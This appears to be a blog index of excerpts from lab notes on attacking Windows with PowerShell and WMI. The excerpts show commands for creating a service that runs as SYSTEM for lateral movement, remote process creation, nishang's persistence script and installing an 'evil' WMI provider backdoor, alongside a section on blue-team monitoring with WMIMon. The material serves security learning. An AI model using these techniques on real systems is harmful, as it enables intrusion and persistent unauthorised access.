Powershell * WMI

Lateral Movement Command Execution Win32_service

PS C:\Users\victim6\Downloads> (Get-CimClass -classname win32_service).cimclassmethods Create a service: PS C:\Users\victim6\Downloads> $servicetype = [byte] 16 PS C:\Users\victim6\Downloads> $ErrorControl = [byte] 1 PS C:\Users\victim6\Downloads> Invoke-WmiMethod -Class win32_service -name create -argumentlist $false, “Windows performance”,$errorcontrol, $null, $null,”WinPerf”,”C:\Windows\Syetm32\calc.exe”, $null, $servicetype, “Manual”, “NT Authority\system”, ” “ PS C:\Users\victim6\Downloads> Get-WmiObject -class win32_service -filter ‘name = “WinPerf”‘ Start the service: PS C:\Users\victim6\Downloads> Get-WmiObject…

Powershell * WMI

WMI Events

Extrinsic events: https://github.com/KurtDeGreeff/PlayPowershell PS C:\Users\victim6\Downloads\PlayPowershell-master\PlayPowershell-master> . .\Get-WMINamespace.ps1 PS C:\Users\victim6\Downloads\PlayPowershell-master\PlayPowershell-master> $namespaces = Get-WMINamespace PS C:\Users\victim6\Downloads\PlayPowershell-master\PlayPowershell-master> foreach ($ns in $namespaces) {get-wmiobject -namespace $ns -list | where {$_._SUPERCLASS -eq ‘ ExtrinsicEvent’} PS C:\Users\victim6\Downloads\PlayPowershell-master\PlayPowershell-master> Get-WmiObject -class win32_perfFormattedData_PerfOS_System PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master> cd .\Utility\ PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Utility> . .\Add-Persistence.ps1 PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Utility> help Add-Persistence –examples PS C:\Users\victim6\Downloads\new\new\tool\tool> cd .\nishang-master\ PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master> cd .\nishang-master\ PS…

Powershell * WMI

WMI Blue Team tools

WMIMON -> tool to monitor WMI activities : https://github.com/luctalpe/WMIMon Realtime event tracelog(ETL) consumer for WMI-activity log. PS C:\Users\victim6\Downloads\WMIMon-master\WMIMon-master\Downloads\WMIMon_Binaries> .\WMIMon.exe On another PS session: PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> Invoke-WmiMethod -Class win32_process -name create -ArgumentList calc.exe -ComputerName 192.168.222.130 On previous PS session we can see the connection on it. PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> Get-WmiObject -class win32_computersystem WMI_Monitor: tool to log WMI…

Powershell * WMI

Backdoor with WMI

Win32 localadmins provider: One of the earlier poc evil WMI provider: https://github.com/rzander/localadmins Evil Network connection WMI Provider: https://github.com/jaredcatkinson/EvilNetConnectionWMIProvider Open the command prompt with admin rights in this path (C:\Users\victim6\Downloads\EvilNetConnectionWMIProvider-master\EvilNetConnectionWMIProvider-master\EvilNetConnectionWMIProvider\bin\Debug): C:\Users\victim6\Downloads\EvilNetConnectionWMIProvider-master\EvilNetConnectionWMIProvider-master\EvilNetConnectionWMIProvider\bin\Debug>InstallUtil.exe EvilNetConnectionWMIProvider.dll On another ps: Here we can see win32_netconnection in output. PS C:\Users\victim6\Downloads> Get-WmiObject -class win32_net* -list PS C:\Users\victim6\Downloads>  Invoke-WmiMethod -class win32_netconnection -name RunPS -ArgumentList…